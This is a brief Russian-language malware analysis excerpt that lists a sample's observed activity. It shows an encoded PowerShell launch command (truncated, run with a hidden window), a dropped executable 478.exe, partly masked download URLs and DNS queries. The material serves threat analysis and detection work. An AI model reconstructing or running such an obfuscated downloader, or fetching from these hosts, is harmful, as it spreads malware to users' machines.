Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABLAFUAQgBVAGoAdwA9ACcAYQBwAHoANABTAGkAcAAnADsAJABUAF8ASABtAEwAbABBAF8AIAA9ACAAJwA0ADcAOAAnADsAJABMAEYAegB3AEMAUwA9ACcAcABOAHoAdABPAFkAJwA7ACQAbwBIADkAWgBXADAAXwAzAD0AJABlAG4AdgA6AHUAc...
- %HOMEPATH%\478.exe
- http://st#####hotography.com/Academie_files/le1t_lzva0bs-93549621/
- http://st###rungen.com/SpryAssets/lnzkDXKkYI/
- http://st###fhuber.com/cgi-bin/hspgafe_zigwi25ew-816/
- http://st###503.com/admin/40uu9gih9_h5wjpc0-29/
- http://ww##.#tore503.com/admin/40uu9gih9_h5wjpc0-29/
- DNS ASK st#####hotography.com
- DNS ASK st###rungen.com
- DNS ASK st###fhuber.com
- DNS ASK st###ossa.net
- DNS ASK st###503.com
- DNS ASK ww##.#tore503.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABLAFUAQgBVAGoAdwA9ACcAYQBwAHoANABTAGkAcAAnADsAJABUAF8ASABtAEwAbABBAF8AIAA9ACAAJwA0ADcAOAAnADsAJABMAEYAegB3AEMAUwA9ACcAcABOAHoAdABPAFkAJwA7ACQAbwBIADkAWgBXADAAXwAzAD0AJABlAG4AdgA6AHUAc...' (со скрытым окном)